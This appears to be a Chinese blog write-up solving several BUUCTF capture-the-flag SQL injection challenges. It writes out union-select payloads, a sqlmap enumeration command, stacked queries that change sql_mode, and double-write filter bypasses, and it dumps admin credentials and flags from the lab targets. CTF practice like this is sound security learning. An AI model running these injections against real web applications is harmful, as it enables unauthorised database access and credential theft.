web-sql注入

BUU SQL COURSE 1

找了一圈也没找到注入点,一开始以为是在登录框,一顿操作发现什么也没有
(然后去搜了一下wp…)
在network那找到注入点
在这里插入图片描述
访问一下在这里插入图片描述
?id=1 and 1=1id=1 and 1=2测试一下在这里插入图片描述在这里插入图片描述被执行了,可以在这注
order by查字段数在这里插入图片描述有2个字段
查显错位?id=-1 union select 111,222在这里插入图片描述
查库名,把其中一个显错位换成database()在这里插入图片描述
看到库名是news,然而并不一定只有一个库,还是用sqlmap把所有库都爆出来
python sqlmap.py -u "http://816528be-67a3-481a-8c1e-6260dcab0f8d.node4.buuoj.cn:81/backend/content_detail.php?id=-1" --dbs

–dbs:查询所有数据库
在这里插入图片描述
当然也可以手工注入获取所有库名,用mysql的函数group_concat()连接所有字段(库名),把所有库名连接成一个字段在一个显错位上输出
?id=-1 union select 111,group_concat(schema_name) from information_schema.schemata,就是行转列,把所有相同的行连接
(之前写的出了点问题,重新写了一些,靶机不一样了)
在这里插入图片描述
结果与sqlmap得到的一样
再用 --tables查表

在这里插入图片描述
在这里插入图片描述
除了mysql自带的就是这些
看了一下字段
在这里插入图片描述
结合这个题目,应该是admin表中的password和username
然后就可以直接查询得到
?id=-1 union select 111,concat(username," ",password) from admin
在这里插入图片描述
{“title”:“111”,“content”:“admin 789ff02d88ae2745271ff3ea379de13a”}

在这里插入图片描述
flag{7fa1f656-2ac1-4316-92d5-c01abf699ad9}

[极客大挑战 2019]EasySQL

先试一下万能密码(不知道是什么闭合,先写个看看
在这里插入图片描述
就万能密码,没了()
在这里插入图片描述

[SUCTF 2019]EasySQL

在这里插入图片描述
emmmmmm…这啥(bushi
用堆叠注入123;show databases;
堆叠注入:将语句堆叠到一起查询,(就是用分号分隔可以执行多条sql语句),这里执行完123之后又执行了show databases,不过有条件限制,php中mysqli_multi_query()函数可以使用,其他的函数可能会被限制
在这里插入图片描述
继续123;show tables;
在这里插入图片描述
继续123;show columns from Flag;
在这里插入图片描述
这里就不行了
看了wp,写那份wp看了别人的wp,
根据输入数字返回1 输入0和字母返回0,大佬猜想执行方式是
select $_POST[query]||flag from Flag
这里的或,如果前一个操作数为真就不会考虑后面的
可以通过补充系统变量@@sql_modesql_mode(一组mysql支持的基本语法及校验规则)
PIPES_AS_CONCAT:将“||”视为字符串的连接操作符而非或运算符
于是就可以123;set sql_mode=pipes_as_concat;select 1
(这里123太长了
也可以用*,1,*被过滤了(并不很明白后面那个1

[极客大挑战 2019]BabySQL

这次是加了过滤的
在这里插入图片描述
先试一下上次的
在这里插入图片描述
不行了在这里插入图片描述
看看过滤了什么
在这里插入图片描述

这里被执行了,说明可以双写绕过
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
发现这样绕过不行,不过这里只过滤了or,可以用or和order拼
还要注释掉后面的闭合
在这里插入图片描述
现在显示正常了在这里插入图片描述
order by 4 时报错,有3个字段
在这里插入图片描述
union select看一下显错位1' ununionion seselectlect 111,222,333 -- ww3
在这里插入图片描述
库名geek在这里插入图片描述
1' ununionion seselectlect 111,222,(selselectect group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema=database()) -- ww3
在这里插入图片描述
表名'b4bsql,geekuser'
推测在geekuser里(然而并不在)
1' ununionion seselectlect 111,222,(selselectect group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_schema=database() anandd table_name='b4bsql') -- ww3
在这里插入图片描述
(selselectect group_concat(username," : ",passwoorrd) frfromom b4bsql)(password里面也有个or。。。
在这里插入图片描述
//用group_concat会方便很多()

[CISCN2019 华北赛区 Day2 Web1]Hack World
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值